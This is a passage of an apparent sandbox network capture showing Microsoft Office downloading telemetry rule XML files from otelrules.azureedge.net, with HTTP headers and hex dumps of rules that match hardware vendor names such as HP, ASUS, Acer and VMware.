16	192.168.2.4	49770	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:07 UTC	192	OUT	GET /rules/rule120613v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:07 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:07 GMT Content-Type: text/xml Content-Length: 632 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6E3779E" x-ms-request-id: b81bee07-c01e-0046-209b-492db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185307Z-r1cf579d7789jf56hC1EWRu58800000001a0000000003met x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-08 18:53:07 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.4	49773	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:09 UTC	192	OUT	GET /rules/rule120614v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:09 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:09 GMT Content-Type: text/xml Content-Length: 467 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT ETag: "0x8DC582BA6C038BC" x-ms-request-id: c4bc35ba-101e-007a-7206-48047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185309Z-r1cf579d778xq4f9hC1EWRx41g000000060g00000000391q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:09 UTC	467	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.4	49774	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:09 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:09 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:09 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: b569e8fb-501e-008c-5305-48cd39000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185309Z-r1cf579d778lntp7hC1EWR9gg400000005k0000000007rvx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:09 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.4	49777	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:09 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:10 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:10 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: 682fb484-401e-0083-5904-48075c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185310Z-r1cf579d778lntp7hC1EWR9gg400000005f000000000btha x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:10 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49775	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:09 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:10 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:10 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB344914B" x-ms-request-id: 3fcfbabf-e01e-0052-0903-48d9df000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185310Z-r1cf579d778w59f9hC1EWRze6w000000069g00000000a7tt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:10 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49776	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:09 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:10 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:10 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: 22943564-b01e-0021-0b03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185310Z-r1cf579d778v97q7hC1EWRf95c00000005tg000000003wcr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:10 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49780	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:11 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:12 UTC	491	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:12 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 55eac1c3-901e-0029-5715-49274a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185312Z-r1cf579d778pftsbhC1EWRa0gn00000000sg000000001msg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-12-08 18:53:12 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	49779	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:11 UTC	192	OUT	GET /rules/rule120619v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:12 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:12 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT ETag: "0x8DC582B9698189B" x-ms-request-id: aae5b6c6-f01e-005d-7a06-4813ba000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185312Z-r1cf579d778mvsklhC1EWRkavg00000006a0000000009bk2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:12 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.4	49783	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:12 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:12 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:12 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: ad3e0835-e01e-0033-5701-484695000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185312Z-r1cf579d7788pwqzhC1EWRrpd8000000069g00000000atft x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:12 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.4	49781	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:12 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:12 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:12 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 1f14184f-601e-0050-3802-482c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185312Z-r1cf579d778x776bhC1EWRdk80000000061g000000008sc7 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:12 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.4	49782	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:12 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:12 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:12 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: 9b36879b-001e-0065-2f2b-490b73000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185312Z-r1cf579d778bb9vvhC1EWRs95400000005ng000000008y1f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:12 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.4	49785	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 18:53:14 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 18:53:14 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 18:53:14 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: c060231a-801e-00ac-2403-48fd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T185314Z-r1cf579d778dfdgnhC1EWRd3w000000005vg000000009n2b x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 18:53:14 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" 